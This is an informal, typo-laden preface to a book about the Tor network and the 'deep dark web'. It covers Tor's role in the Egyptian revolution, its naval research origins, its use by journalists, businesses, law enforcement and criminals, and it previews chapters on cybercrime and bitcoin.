The recent revolution in Egypt that ended the autocratic presidency of Hosni Mubarak was a modern example of successful nonviolent resistance. Social Media technologies provided a useful tool for the young activist to orchestrate this revolution. However the repressive Mubarak regime prosecuted many activists and censored a number of websites. This made their activities precarious, making it necessary for activists to hide their identity on the Internet. The anonymity software Tor was a tool used by some bloggers, journalists and online activists to protect their identity and to practice free speech.

Today we have lot’s of anonymity communication tools I2P, Freenet, Gnunet and Tor to name a few. Why did the TorProject.org Tor-.onion network become the facto application to get free, private, anonymized Internet access. My conclusion is it’s humble beginnings with “Naval Research Project & DARPA (Defense Advanced Research Project Agency) ” sponsored, maybe you heard of DARPA they kinda created the Internet a long time ago. The government wanted to have a communication secure media that would piggy-bak on the establish Internet. From my point of view when they saw how good this worked the government used it to allow it’s agents to quietly use the network for CIA covert operations (just to name a few alphabet soup government agencies that use it). For example a branch of the U.S. Navy uses Tor for open source intelligence gathering, and one of its teams used Tor while deployed in the Middle East recently. Law enforcement uses Tor for visiting or surveilling web sites without leaving government IP addresses in their web logs, and for security during sting operations.

Journalist got a hold of this tool and they too were able to file reports before governments agents censored their interviews and film footage. The EFF (Electronic Frontier Foundation) got a hold of the Tor-networks and promoted it to maintaining civil liberties online. When the common business executive visited a foreign country (like China know to monitor foreigners Internet access) they now had a way to securely connect to their corporate HQ data-center without being monitored and giving away IP (Intellectual Properties). The Tor-Network became to good and the bad guy’s moved in to keep their illegal business safer from the law. The Internet Cyber-criminal has used the claer-web since the start so of course they went over to the Tor-.onion network because it works if you use it right and keeps you anonymous online.

With all this happening and the “Year of the Hack 2011” you can see why security geeks like Pierluigi and I became intrigued with this subject and we teamed up to write this manuscript hoping to answer some of the questions our friends, and peers were asking us about this mysterious hidden world call the deep dark web. We outlined a table of content and started to write about it in our blogs and the story unfolds from here to you. We hope to educate you on how this network works without too much geek talk (ok just a little). We cover the cyber criminals and their ecosystem we cover the financial currency (bitCoins) that is replacing fiat currencies all over the world during this unstable financial times. We tried to cover all the good , the bad and the ugly of the .onion network. We hope it will answer some of your questions but I am sure that more question will come up so feel free to come to our websites and give us a shout and ask your questions about the deep dark web…. - gAtO oUT